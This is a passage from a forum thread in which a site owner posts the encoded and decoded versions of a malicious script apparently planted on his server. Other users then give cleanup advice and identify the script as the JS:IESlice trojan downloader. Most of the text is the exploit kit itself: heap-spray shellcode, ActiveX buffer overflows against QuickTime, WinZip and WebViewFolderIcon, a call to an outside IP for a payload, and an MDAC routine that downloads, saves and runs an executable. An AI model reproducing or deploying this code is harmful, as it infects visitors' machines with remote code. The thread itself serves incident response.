29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72 %65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%7 3%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a% 09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76 %5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%
62%6a%65%63%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f %66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%0 9%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30% 5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28 %61%2c%20%22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%7 2%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a% 0a%09%09%09%69%66%20%28%21%20%76%5b%31%5d%29%20%7b %0a%09%09%09%09%76%5b%31%5d%20%3d%20%43%72%65%61%7 4%65%4f%62%6a%65%63%74%28%61%2c%20%22%41%44%4f%44% 42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a %0a%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7 b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61% 74%65%4f%62%6a%65%63%74%28%61%2c%20%22%57%53%63%72 %69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%0 9%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09% 09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f %62%6a%65%63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%4 1%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09% 09%09%09%69%66%20%28%76%5b%32%5d%29%20%6e%3d%31%3b %0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%
09%7d%0a%0a%09%09%69%2b%2b%3b%0a%09%7d%0a%0a%09%69 %66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%2 6%26%20%76%5b%32%5d%29%20%7b%0a%09%09%76%61%72%20% 64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77 %6e%6c%6f%61%64%28%76%5b%30%5d%2c%20%75%72%6c%52%6 5%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61% 74%61%20%21%3d%20%30%29%20%7b%0a%09%09%09%76%61%72 %20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%73%79%73%2 2%2b%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%34% 29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28 %41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%7 6%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29% 20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%69%66%20%28 %53%68%65%6c%6c%45%78%65%63%75%74%65%28%76%5b%32%5 d%2c%20%6e%61%6d%65%2c%20%6e%29%20%3d%3d%20%31%29% 20%7b%0a%09%09%09%09%09%72%65%74%3d%31%3b%0a%09%09 %09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%09%7d%0a%0 a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%0a% 66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%28%29%20 %7b%0a%0a%09%69%66%20%28%21%20%4d%44%41%
43%28%29%20%29%20%7b%20%73%74%61%72%74%4f%76%65%72 %66%6c%6f%77%28%30%29%3b%20%7d%0a%0a%7d%0a%0a%73%7 4%61%72%74%20%28%29%3b%0a%0a%3c%2f%73%63%72%69%70% 74%3e%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c %3e%0a%0a%0a');

document.write (SB);


Cheers for any help offered

Paul

If its any help the basic encryped parts when decrypted are:

<html>
<body>
<div id="mydiv"></div>

<script language="JavaScript">

var memory = new Array();
var mem_flag = 0;

function having() { memory=memory; setTimeout("having()", 2000); }

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{spraySlide += spraySlide;}

spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u80 01%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef% u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66% ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087% u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615% uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0% u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7% uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba% uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc% uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba% uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403% ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019% uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4% uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1" +
OUTPUT MR2 HERE
);
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x3;
var spraySlide = unescape("%u0c0c%u0c0c");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

mem_flag = 1;
having();
return memory;
}

function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c );
}catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="http://66.96.218.85/download/167212/movie.qtl">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }

if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);

} else if (num == 1) {
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");

var ret=winzip.CreateNewFolderFromName(unescape("%00") );
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}

} catch(e) { }

if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);

} else if (num == 2) {

try {
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe =
OUTPUT MU2 HERE
;

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}

if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MDAC() ) { startOverflow(0); }

}

start ();

</script>
</body>
</html>

Seems pretty clear that the server has been cracked. I wonder...did you check the signatures on all the security updates to the server? Someone got you.

Do you have hard passwords set on SSH and ftp? Do you have root login disabled? Who has physical access to the server?

If you are unable to find the particular code that is compromised, your best solution is to start over with a clean install of the OS. Actually, this is your best solution anyway. After doing the clean install, install and configure tripwire to keep track of changes.

Sounds like the right solution to me, and a permanent one too. Though if you're going to rebuild using a newer version of RHEL might as well use SELinux instead.

Maybe could help to know what the name of the virus is JS:IESlice.

With this name is detected by Avast Antivirus. Seems to be new in the city (first spots reported on July 15 or so) and exist only a few reference in the web about this trojan downloader.